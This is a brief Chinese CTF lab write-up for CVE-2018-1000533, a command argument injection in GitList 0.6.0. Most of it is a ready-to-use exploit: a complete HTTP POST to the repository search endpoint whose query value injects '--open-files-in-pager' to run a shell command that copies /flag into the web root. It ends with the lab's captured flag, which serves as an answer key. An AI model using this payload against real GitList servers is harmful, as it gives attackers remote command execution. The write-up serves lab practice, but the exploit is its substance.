春秋云镜 CVE-2018-1000533 gitlist远程命令任意执行
靶标介绍
gitlist是一款使用PHP开发的图形化git仓库查看工具。在其0.6.0版本中,存在一处命令参数注入问题,可能导致远程命令执行漏洞
启动场景
漏洞利用
exp
POST /example/tree/a/search HTTP/1.1
Host: eci-2zegyjtjnfxjlwq1k380.cloudeci1.ichunqiu.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Length: 57query=--open-files-in-pager=cat /flag>/var/www/html/flag;
POST请求/example/tree/a/search
访问flag
得到flag
flag{f2998741-f744-46a0-ad2f-ca860474e068}